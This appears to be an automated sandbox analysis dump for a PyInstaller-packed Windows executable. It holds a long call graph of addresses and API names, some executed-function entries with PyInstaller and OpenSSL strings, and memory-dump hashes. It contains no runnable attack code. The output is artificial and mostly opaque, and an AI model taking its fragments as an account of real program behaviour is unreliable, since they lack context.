74778->74697 74779->74697 74780->74697 74781->74719 74782->74720 74783->74697 74784->74749 74786 7ff67aed45b0 108 API calls 74785->74786 74787 7ff67aed1493 74786->74787 74788 7ff67aed149b 74787->74788 74789 7ff67aed14bc 74787->74789 74838 7ff67aed2710 54 API calls _log10_special 74788->74838 74790 7ff67aee0744 73 API calls 74789->74790 74792 7ff67aed14d1 74790->74792 74794 7ff67aed14d5 74792->74794 74795 7ff67aed14f8 74792->74795 74793 7ff67aed14ab 74793->74731 74839 7ff67aee4f78 11 API calls _get_daylight 74794->74839 74799 7ff67aed1532 74795->74799 74800 7ff67aed1508 74795->74800 74797 7ff67aed14da 74840 7ff67aed2910 54 API calls _log10_special 74797->74840 74801 7ff67aed1538 74799->74801 74810 7ff67aed154b 74799->74810 74841 7ff67aee4f78 11 API calls _get_daylight 74800->74841 74816 7ff67aed1210 74801->74816 74804 7ff67aed1510 74842 7ff67aed2910 54 API calls _log10_special 74804->74842 74805 7ff67aee00bc 74 API calls 74808 7ff67aed15c4 74805->74808 74806 7ff67aed14f3 __std_exception_copy 74806->74805 74808->74731 74809 7ff67aee040c _fread_nolock 53 API calls 74809->74810 74810->74806 74810->74809 74811 7ff67aed15d6 74810->74811 74843 7ff67aee4f78 11 API calls _get_daylight 74811->74843 74813 7ff67aed15db 74844 7ff67aed2910 54 API calls _log10_special 74813->74844 74815->74727 74817 7ff67aed1268 74816->74817 74818 7ff67aed126f 74817->74818 74819 7ff67aed1297 74817->74819 74849 7ff67aed2710 54 API calls _log10_special 74818->74849 74822 7ff67aed12d4 74819->74822 74823 7ff67aed12b1 74819->74823 74821 7ff67aed1282 74821->74806 74827 7ff67aed12e6 74822->74827 74832 7ff67aed1309 memcpy_s 74822->74832 74850 7ff67aee4f78 11 API calls _get_daylight 74823->74850 74825 7ff67aed12b6 74851 7ff67aed2910 54 API calls _log10_special 74825->74851 74852 7ff67aee4f78 11 API calls _get_daylight 74827->74852 74829 7ff67aed12eb 74853 7ff67aed2910 54 API calls _log10_special 74829->74853 74830 7ff67aee040c _fread_nolock 53 API calls 74830->74832 74832->74830 74833 7ff67aed12cf __std_exception_copy 74832->74833 74836 7ff67aed13cf 74832->74836 74837 7ff67aee0180 37 API calls 74832->74837 74845 7ff67aee0b4c 74832->74845 74833->74806 74854 7ff67aed2710 54 API calls _log10_special 74836->74854 74837->74832 74838->74793 74839->74797 74840->74806 74841->74804 74842->74806 74843->74813 74844->74806 74846 7ff67aee0b7c 74845->74846 74855 7ff67aee089c 74846->74855 74848 7ff67aee0b9a 74848->74832 74849->74821 74850->74825 74851->74833 74852->74829 74853->74833 74854->74833 74856 7ff67aee08e9 74855->74856 74857 7ff67aee08bc 74855->74857 74856->74848 74857->74856 74858 7ff67aee08f1 74857->74858 74859 7ff67aee08c6 74857->74859 74862 7ff67aee07dc 74858->74862 74869 7ff67aeea884 37 API calls 2 library calls 74859->74869 74870 7ff67aee54dc EnterCriticalSection 74862->74870 74864 7ff67aee07f9 74865 7ff67aee081c 74 API calls 74864->74865 74866 7ff67aee0802 74865->74866 74867 7ff67aee54e8 _fread_nolock LeaveCriticalSection 74866->74867 74868 7ff67aee080d 74867->74868 74868->74856 74869->74856 74875 7ff67aee4a4e 74871->74875 74872 7ff67aee4a73 74889 7ff67aeea884 37 API calls 2 library calls 74872->74889 74874 7ff67aee4aaf 74890 7ff67aee2c80 49 API calls _invalid_parameter_noinfo 74874->74890 74875->74872 74875->74874 74877 7ff67aee4a9d 74879 7ff67aedc5c0 _log10_special 8 API calls 74877->74879 74878 7ff67aee4b58 74884 7ff67aee4b8c 74878->74884 74888 7ff67aee4b61 74878->74888 74881 7ff67aed1cc8 74879->74881 74880 7ff67aeea9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 74880->74877 74881->74290 74882 7ff67aee4b46 74882->74878 74883 7ff67aee4bb0 74882->74883 74882->74884 74882->74888 74883->74884 74885 7ff67aee4bba 74883->74885 74884->74880 74887 7ff67aeea9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 74885->74887 74887->74877 74891 7ff67aeea9b8 74888->74891 74889->74877 74890->74882 74892 7ff67aeea9bd RtlFreeHeap 74891->74892 74896 7ff67aeea9ec 74891->74896 74893 7ff67aeea9d8 GetLastError 74892->74893 74892->74896 74894 7ff67aeea9e5 Concurrency::details::SchedulerProxy::DeleteThis 74893->74894 74897 7ff67aee4f78 11 API calls _get_daylight 74894->74897 74896->74877 74897->74896 74899 7ff67aee5f38 74898->74899 74900 7ff67aee5f5e 74899->74900 74903 7ff67aee5f91 74899->74903 74929 7ff67aee4f78 11 API calls _get_daylight 74900->74929 74902 7ff67aee5f63 74930 7ff67aeea950 37 API calls _invalid_parameter_noinfo 74902->74930 74905 7ff67aee5fa4 74903->74905 74906 7ff67aee5f97 74903->74906 74917 7ff67aeeac98 74905->74917 74931 7ff67aee4f78 11 API calls _get_daylight 74906->74931 74907 7ff67aed4606 74907->74540 74911 7ff67aee5fc5 74924 7ff67aeeff3c 74911->74924 74912 7ff67aee5fb8 74932 7ff67aee4f78 11 API calls _get_daylight 74912->74932 74915 7ff67aee5fd8 74933 7ff67aee54e8 LeaveCriticalSection 74915->74933 74934 7ff67aef0348 EnterCriticalSection 74917->74934 74919 7ff67aeeacaf 74920 7ff67aeead0c 19 API calls 74919->74920 74921 7ff67aeeacba 74920->74921 74922 7ff67aef03a8 _isindst LeaveCriticalSection 74921->74922 74923 7ff67aee5fae 74922->74923 74923->74911 74923->74912 74935 7ff67aeefc38 74924->74935 74927 7ff67aeeff96 74927->74915 74929->74902 74930->74907 74931->74907 74932->74907 74940 7ff67aeefc73 __vcrt_FlsAlloc 74935->74940 74937 7ff67aeeff11 74954 7ff67aeea950 37 API calls _invalid_parameter_noinfo 74937->74954 74939 7ff67aeefe43 74939->74927 74947 7ff67aef6dc4 74939->74947 74945 7ff67aeefe3a 74940->74945 74950 7ff67aee7aac 51 API calls 3 library calls 74940->74950 74942 7ff67aeefea5 74942->74945 74951 7ff67aee7aac 51 API calls 3 library calls 74942->74951 74944 7ff67aeefec4 74944->74945 74952 7ff67aee7aac 51 API calls 3 library calls 74944->74952 74945->74939 74953 7ff67aee4f78 11 API calls _get_daylight 74945->74953 74955 7ff67aef63c4 74947->74955 74950->74942 74951->74944 74952->74945 74953->74937 74954->74939 74956 7ff67aef63db 74955->74956 74957 7ff67aef63f9 74955->74957 75009 7ff67aee4f78 11 API calls _get_daylight 74956->75009 74957->74956 74960 7ff67aef6415 74957->74960 74959 7ff67aef63e0 75010 7ff67aeea950 37 API calls _invalid_parameter_noinfo 74959->75010 74966 7ff67aef69d4 74960->74966 74964 7ff67aef63ec 74964->74927 75012 7ff67aef6708 74966->75012 74969 7ff67aef6a61 75032 7ff67aee8590 74969->75032 74970 7ff67aef6a49 75044 7ff67aee4f58 11 API calls _get_daylight 74970->75044 74982 7ff67aef6440 74982->74964 75011 7ff67aee8568 LeaveCriticalSection 74982->75011 74989 7ff67aef6a4e 75045 7ff67aee4f78 11 API calls _get_daylight 74989->75045 75009->74959 75010->74964 75013 7ff67aef6734 75012->75013 75017 7ff67aef674e 75012->75017 75013->75017 75057 7ff67aee4f78 11 API calls _get_daylight 75013->75057 75015 7ff67aef6743 75058 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75015->75058 75019 7ff67aef67cc 75017->75019 75059 7ff67aee4f78 11 API calls _get_daylight 75017->75059 75018 7ff67aef681d 75028 7ff67aef687a 75018->75028 75063 7ff67aee9be8 37 API calls 2 library calls 75018->75063 75019->75018 75061 7ff67aee4f78 11 API calls _get_daylight 75019->75061 75022 7ff67aef6876 75025 7ff67aef68f8 75022->75025 75022->75028 75024 7ff67aef6812 75062 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75024->75062 75064 7ff67aeea970 17 API calls _isindst 75025->75064 75026 7ff67aef67c1 75060 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75026->75060 75028->74969 75028->74970 75065 7ff67aef0348 EnterCriticalSection 75032->75065 75044->74989 75045->74982 75057->75015 75058->75017 75059->75026 75060->75019 75061->75024 75062->75018 75063->75022 75067 7ff67aee7968 75066->75067 75070 7ff67aee7444 75067->75070 75069 7ff67aee7981 75069->74548 75071 7ff67aee745f 75070->75071 75072 7ff67aee748e 75070->75072 75081 7ff67aeea884 37 API calls 2 library calls 75071->75081 75080 7ff67aee54dc EnterCriticalSection 75072->75080 75075 7ff67aee747f 75075->75069 75076 7ff67aee7493 75077 7ff67aee74b0 38 API calls 75076->75077 75078 7ff67aee749f 75077->75078 75079 7ff67aee54e8 _fread_nolock LeaveCriticalSection 75078->75079 75079->75075 75081->75075 75083 7ff67aedfeb3 75082->75083 75084 7ff67aedfee1 75082->75084 75093 7ff67aeea884 37 API calls 2 library calls 75083->75093 75086 7ff67aedfed3 75084->75086 75092 7ff67aee54dc EnterCriticalSection 75084->75092 75086->74554 75088 7ff67aedfef8 75089 7ff67aedff14 72 API calls 75088->75089 75090 7ff67aedff04 75089->75090 75091 7ff67aee54e8 _fread_nolock LeaveCriticalSection 75090->75091 75091->75086 75093->75086 75094->74571 75096 7ff8a8aa6ee0 75097 7ff8a8aa7ad6 75096->75097 75104 7ff8a8aa6ef8 75096->75104 75098 7ff8a8aa79e3 LoadLibraryA 75099 7ff8a8aa79fd 75098->75099 75102 7ff8a8aa7a1c GetProcAddress 75099->75102 75099->75104 75101 7ff8a8aa7a3e VirtualProtect VirtualProtect 75101->75097 75102->75099 75103 7ff8a8aa7a33 75102->75103 75104->75098 75104->75101 75105 7ff8b910982c 75106 7ff8b910985b 75105->75106 75107 7ff8b9109881 75106->75107 75109 7ff8b91098dc 75106->75109 75110 7ff8b910990e 75109->75110 75111 7ff8b9103e74 5 API calls 75110->75111 75115 7ff8b910992c 75110->75115 75113 7ff8b91099ce 75111->75113 75114 7ff8b9103e74 5 API calls 75113->75114 75113->75115 75116 7ff8b9104610 WSAGetLastError 75113->75116 75114->75113 75115->75107 75116->75113 75117 7ff67aed2fe0 75118 7ff67aed2ff0 75117->75118 75119 7ff67aed3041 75118->75119 75120 7ff67aed302b 75118->75120 75122 7ff67aed3061 75119->75122 75132 7ff67aed3077 __std_exception_copy 75119->75132 75145 7ff67aed2710 54 API calls _log10_special 75120->75145 75146 7ff67aed2710 54 API calls _log10_special 75122->75146 75124 7ff67aedc5c0 _log10_special 8 API calls 75126 7ff67aed31fa 75124->75126 75125 7ff67aed3037 __std_exception_copy 75125->75124 75127 7ff67aed1470 116 API calls 75127->75132 75128 7ff67aed3349 75153 7ff67aed2710 54 API calls _log10_special 75128->75153 75130 7ff67aed1c80 49 API calls 75130->75132 75131 7ff67aed3333 75152 7ff67aed2710 54 API calls _log10_special 75131->75152 75132->75125 75132->75127 75132->75128 75132->75130 75132->75131 75134 7ff67aed330d 75132->75134 75136 7ff67aed3207 75132->75136 75151 7ff67aed2710 54 API calls _log10_special 75134->75151 75137 7ff67aed3273 75136->75137 75147 7ff67aeea474 37 API calls 2 library calls 75136->75147 75139 7ff67aed329e 75137->75139 75140 7ff67aed3290 75137->75140 75149 7ff67aed2dd0 37 API calls 75139->75149 75148 7ff67aeea474 37 API calls 2 library calls 75140->75148 75143 7ff67aed329c 75150 7ff67aed2500 54 API calls __std_exception_copy 75143->75150 75145->75125 75146->75125 75147->75137 75148->75143 75149->75143 75150->75125 75151->75125 75152->75125 75153->75125 75234 7ff8a9307140 75235 7ff8a9307150 75234->75235 75236 7ff8a9307160 75235->75236 75237 7ff8a9326905 SetLastError 75235->75237 75238 7ff8a92e1cf8 SetLastError 75235->75238 75239 7ff8a92e146a SetLastError 75235->75239 75237->75236 75238->75236 75239->75236 75240 7ff8a930f870 75241 7ff8a930f88a 75240->75241 75242 7ff8a930f8a0 75241->75242 75244 7ff8a92e1f32 75241->75244 75244->75242 75245 7ff8a92f8350 75244->75245 75246 7ff8a92f836a SetLastError 75245->75246 75247 7ff8a92f8391 75246->75247 75247->75242 75163 7ff8a9337b50 75165 7ff8a9337b68 75163->75165 75164 7ff8a9337c76 75165->75164 75166 7ff8a92e1b4a 9 API calls 75165->75166 75166->75165 75167 7ff8b9109e34 75168 7ff8b9109e47 75167->75168 75169 7ff8b9109ea6 75168->75169 75171 7ff8b9109f18 00007FF8A8C4BB78 75168->75171 75172 7ff8b9109f4c 75171->75172 75180 7ff8b9109f79 75171->75180 75183 7ff8b910be54 CertOpenStore 75172->75183 75174 7ff8b9109f5c 75176 7ff8b9109f6b GetLastError 75174->75176 75174->75180 75175 7ff8b910a039 CertEnumCertificatesInStore 75179 7ff8b910a04e 75175->75179 75182 7ff8b9109f54 75175->75182 75176->75180 75177 7ff8b910a0ec CertCloseStore 75177->75174 75177->75180 75178 7ff8b910a0a4 CertFreeCertificateContext 75178->75179 75179->75177 75180->75169 75181 7ff8b910a053 75181->75178 75182->75174 75182->75175 75182->75181 75184 7ff8b910be92 75183->75184 75189 7ff8b910be8e 75183->75189 75185 7ff8b910be96 CertOpenStore 75184->75185 75187 7ff8b910bedb CertCloseStore 75184->75187 75188 7ff8b910bef0 75184->75188 75185->75184 75186 7ff8b910bec1 CertAddStoreToCollection 75185->75186 75186->75184 75186->75187 75187->75184 75188->75189 75190 7ff8b910bef5 CertCloseStore 75188->75190 75189->75182 75190->75189 75191 7ff67aee5698 75192 7ff67aee56b2 75191->75192 75193 7ff67aee56cf 75191->75193 75216 7ff67aee4f58 11 API calls _get_daylight 75192->75216 75193->75192 75195 7ff67aee56e2 CreateFileW 75193->75195 75197 7ff67aee574c 75195->75197 75198 7ff67aee5716 75195->75198 75196 7ff67aee56b7 75217 7ff67aee4f78 11 API calls _get_daylight 75196->75217 75220 7ff67aee5c74 46 API calls 3 library calls 75197->75220 75219 7ff67aee57ec 59 API calls 3 library calls 75198->75219 75202 7ff67aee5751 75205 7ff67aee5755 75202->75205 75206 7ff67aee5780 75202->75206 75203 7ff67aee56bf 75218 7ff67aeea950 37 API calls _invalid_parameter_noinfo 75203->75218 75204 7ff67aee5724 75208 7ff67aee5741 CloseHandle 75204->75208 75209 7ff67aee572b CloseHandle 75204->75209 75221 7ff67aee4eec 11 API calls 2 library calls 75205->75221 75222 7ff67aee5a34 51 API calls 75206->75222 75212 7ff67aee56ca 75208->75212 75209->75212 75213 7ff67aee578d 75223 7ff67aee5b70 21 API calls _fread_nolock 75213->75223 75215 7ff67aee575f 75215->75212 75216->75196 75217->75203 75218->75212 75219->75204 75220->75202 75221->75215 75222->75213 75223->75215

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF67AED1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 7ff67aed1000-7ff67aed3806 call 7ff67aedfe88 call 7ff67aedfe90 call 7ff67aedc8c0 call 7ff67aee5460 call 7ff67aee54f4 call 7ff67aed36b0 14 7ff67aed3814-7ff67aed3836 call 7ff67aed1950 0->14 15 7ff67aed3808-7ff67aed380f 0->15 20 7ff67aed391b-7ff67aed3931 call 7ff67aed45b0 14->20 21 7ff67aed383c-7ff67aed3856 call 7ff67aed1c80 14->21 17 7ff67aed3c97-7ff67aed3cb2 call 7ff67aedc5c0 15->17 28 7ff67aed3933-7ff67aed3960 call 7ff67aed7f80 20->28 29 7ff67aed396a-7ff67aed397f call 7ff67aed2710 20->29 25 7ff67aed385b-7ff67aed389b call 7ff67aed8a20 21->25 34 7ff67aed38c1-7ff67aed38cc call 7ff67aee4fa0 25->34 35 7ff67aed389d-7ff67aed38a3 25->35 41 7ff67aed3962-7ff67aed3965 call 7ff67aee00bc 28->41 42 7ff67aed3984-7ff67aed39a6 call 7ff67aed1c80 28->42 37 7ff67aed3c8f 29->37 49 7ff67aed38d2-7ff67aed38e1 call 7ff67aed8a20 34->49 50 7ff67aed39fc-7ff67aed3a2a call 7ff67aed8b30 call 7ff67aed8b90 * 3 34->50 38 7ff67aed38a5-7ff67aed38ad 35->38 39 7ff67aed38af-7ff67aed38bd call 7ff67aed8b90 35->39 37->17 38->39 39->34 41->29 53 7ff67aed39b0-7ff67aed39b9 42->53 57 7ff67aed39f4-7ff67aed39f7 call 7ff67aee4fa0 49->57 58 7ff67aed38e7-7ff67aed38ed 49->58 76 7ff67aed3a2f-7ff67aed3a3e call 7ff67aed8a20 50->76 53->53 56 7ff67aed39bb-7ff67aed39d8 call 7ff67aed1950 53->56 56->25 68 7ff67aed39de-7ff67aed39ef call 7ff67aed2710 56->68 57->50 61 7ff67aed38f0-7ff67aed38fc 58->61 65 7ff67aed3905-7ff67aed3908 61->65 66 7ff67aed38fe-7ff67aed3903 61->66 65->57 69 7ff67aed390e-7ff67aed3916 call 7ff67aee4fa0 65->69 66->61 66->65 68->37 69->76 79 7ff67aed3a44-7ff67aed3a47 76->79 80 7ff67aed3b45-7ff67aed3b53 76->80 79->80 83 7ff67aed3a4d-7ff67aed3a50 79->83 81 7ff67aed3a67 80->81 82 7ff67aed3b59-7ff67aed3b5d 80->82 84 7ff67aed3a6b-7ff67aed3a90 call 7ff67aee4fa0 81->84 82->84 85 7ff67aed3b14-7ff67aed3b17 83->85 86 7ff67aed3a56-7ff67aed3a5a 83->86 94 7ff67aed3a92-7ff67aed3aa6 call 7ff67aed8b30 84->94 95 7ff67aed3aab-7ff67aed3ac0 84->95 89 7ff67aed3b2f-7ff67aed3b40 call 7ff67aed2710 85->89 90 7ff67aed3b19-7ff67aed3b1d 85->90 86->85 88 7ff67aed3a60 86->88 88->81 98 7ff67aed3c7f-7ff67aed3c87 89->98 90->89 91 7ff67aed3b1f-7ff67aed3b2a 90->91 91->84 94->95 99 7ff67aed3ac6-7ff67aed3aca 95->99 100 7ff67aed3be8-7ff67aed3bfa call 7ff67aed8a20 95->100 98->37 102 7ff67aed3ad0-7ff67aed3ae8 call 7ff67aee52c0 99->102 103 7ff67aed3bcd-7ff67aed3be2 call 7ff67aed1940 99->103 108 7ff67aed3c2e 100->108 109 7ff67aed3bfc-7ff67aed3c02 100->109 113 7ff67aed3b62-7ff67aed3b7a call 7ff67aee52c0 102->113 114 7ff67aed3aea-7ff67aed3b02 call 7ff67aee52c0 102->114 103->99 103->100 115 7ff67aed3c31-7ff67aed3c40 call 7ff67aee4fa0 108->115 111 7ff67aed3c04-7ff67aed3c1c 109->111 112 7ff67aed3c1e-7ff67aed3c2c 109->112 111->115 112->115 122 7ff67aed3b7c-7ff67aed3b80 113->122 123 7ff67aed3b87-7ff67aed3b9f call 7ff67aee52c0 113->123 114->103 124 7ff67aed3b08-7ff67aed3b0f 114->124 125 7ff67aed3d41-7ff67aed3d63 call 7ff67aed44d0 115->125 126 7ff67aed3c46-7ff67aed3c4a 115->126 122->123 139 7ff67aed3ba1-7ff67aed3ba5 123->139 140 7ff67aed3bac-7ff67aed3bc4 call 7ff67aee52c0 123->140 124->103 137 7ff67aed3d65-7ff67aed3d6f call 7ff67aed4620 125->137 138 7ff67aed3d71-7ff67aed3d82 call 7ff67aed1c80 125->138 127 7ff67aed3cd4-7ff67aed3ce6 call 7ff67aed8a20 126->127 128 7ff67aed3c50-7ff67aed3c5f call 7ff67aed90e0 126->128 143 7ff67aed3d35-7ff67aed3d3c 127->143 144 7ff67aed3ce8-7ff67aed3ceb 127->144 141 7ff67aed3cb3-7ff67aed3cbd call 7ff67aed8850 128->141 142 7ff67aed3c61 128->142 152 7ff67aed3d87-7ff67aed3d96 137->152 138->152 139->140 140->103 154 7ff67aed3bc6 140->154 164 7ff67aed3cbf-7ff67aed3cc6 141->164 165 7ff67aed3cc8-7ff67aed3ccf 141->165 149 7ff67aed3c68 call 7ff67aed2710 142->149 143->149 144->143 150 7ff67aed3ced-7ff67aed3d10 call 7ff67aed1c80 144->150 160 7ff67aed3c6d-7ff67aed3c77 149->160 166 7ff67aed3d12-7ff67aed3d26 call 7ff67aed2710 call 7ff67aee4fa0 150->166 167 7ff67aed3d2b-7ff67aed3d33 call 7ff67aee4fa0 150->167 157 7ff67aed3dc4-7ff67aed3dda call 7ff67aed9400 152->157 158 7ff67aed3d98-7ff67aed3d9f 152->158 154->103 170 7ff67aed3ddc 157->170 171 7ff67aed3de8-7ff67aed3e04 SetDllDirectoryW 157->171 158->157 162 7ff67aed3da1-7ff67aed3da5 158->162 160->98 162->157 168 7ff67aed3da7-7ff67aed3dbe SetDllDirectoryW LoadLibraryExW 162->168 164->149 165->152 166->160 167->152 168->157 170->171 174 7ff67aed3f01-7ff67aed3f08 171->174 175 7ff67aed3e0a-7ff67aed3e19 call 7ff67aed8a20 171->175 180 7ff67aed3f0e-7ff67aed3f15 174->180 181 7ff67aed3ffc-7ff67aed4004 174->181 189 7ff67aed3e32-7ff67aed3e3c call 7ff67aee4fa0 175->189 190 7ff67aed3e1b-7ff67aed3e21 175->190 180->181 186 7ff67aed3f1b-7ff67aed3f25 call 7ff67aed33c0 180->186 182 7ff67aed4006-7ff67aed4023 PostMessageW GetMessageW 181->182 183 7ff67aed4029-7ff67aed4034 call 7ff67aed36a0 call 7ff67aed3360 181->183 182->183 200 7ff67aed4039-7ff67aed405b call 7ff67aed3670 call 7ff67aed6fb0 call 7ff67aed6d60 183->200 186->160 196 7ff67aed3f2b-7ff67aed3f3f call 7ff67aed90c0 186->196 201 7ff67aed3ef2-7ff67aed3efc call 7ff67aed8b30 189->201 202 7ff67aed3e42-7ff67aed3e48 189->202 193 7ff67aed3e23-7ff67aed3e2b 190->193 194 7ff67aed3e2d-7ff67aed3e2f 190->194 193->194 194->189 207 7ff67aed3f64-7ff67aed3fa7 call 7ff67aed8b30 call 7ff67aed8bd0 call 7ff67aed6fb0 call 7ff67aed6d60 call 7ff67aed8ad0 196->207 208 7ff67aed3f41-7ff67aed3f5e PostMessageW GetMessageW 196->208 201->174 202->201 206 7ff67aed3e4e-7ff67aed3e54 202->206 210 7ff67aed3e5f-7ff67aed3e61 206->210 211 7ff67aed3e56-7ff67aed3e58 206->211 247 7ff67aed3fe9-7ff67aed3ff7 call 7ff67aed1900 207->247 248 7ff67aed3fa9-7ff67aed3fb3 call 7ff67aed9200 207->248 208->207 210->174 212 7ff67aed3e67-7ff67aed3e83 call 7ff67aed6db0 call 7ff67aed7330 210->212 211->212 215 7ff67aed3e5a 211->215 227 7ff67aed3e85-7ff67aed3e8c 212->227 228 7ff67aed3e8e-7ff67aed3e95 212->228 215->174 230 7ff67aed3edb-7ff67aed3ef0 call 7ff67aed2a50 call 7ff67aed6fb0 call 7ff67aed6d60 227->230 231 7ff67aed3eaf-7ff67aed3eb9 call 7ff67aed71a0 228->231 232 7ff67aed3e97-7ff67aed3ea4 call 7ff67aed6df0 228->232 230->174 245 7ff67aed3ec4-7ff67aed3ed2 call 7ff67aed74e0 231->245 246 7ff67aed3ebb-7ff67aed3ec2 231->246 232->231 244 7ff67aed3ea6-7ff67aed3ead 232->244 244->230 245->174 256 7ff67aed3ed4 245->256 246->230 247->160 248->247 259 7ff67aed3fb5-7ff67aed3fca 248->259 256->230 260 7ff67aed3fe4 call 7ff67aed2a50 259->260 261 7ff67aed3fcc-7ff67aed3fdf call 7ff67aed2710 call 7ff67aed1900 259->261 260->247 261->160
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                          • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                          • Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                                          • Instruction ID: cafc582e4898b173757be918cddb94462a8f1988d49ae1e67d160993d5bff82a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A329F23A2C68391FA69BB24D4543B96761AFC4784FA440B6DA4DC32F6EF2CE554E700
                                                                                                                                                                                                                                          Function 00007FF8A92E195B Relevance: 23.5, APIs: 5, Strings: 8, Instructions: 785COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                                          • API String ID: 0-352295518
                                                                                                                                                                                                                                          • Opcode ID: 3479779f4e97ba25f539c5ee64d721bf2629ffcc85696f0b63aa88c04eb821c1
                                                                                                                                                                                                                                          • Instruction ID: d48acc1fe5c589b88c955a977604eeabb911dd1e9e78fbb49505ceccce7fb6d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3479779f4e97ba25f539c5ee64d721bf2629ffcc85696f0b63aa88c04eb821c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3729D72A4E682D6FB208E15E4447B937A0EB84BC8F144135DA6D8B78CDFBDD994C700
                                                                                                                                                                                                                                          Function 00007FF67AEF69D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
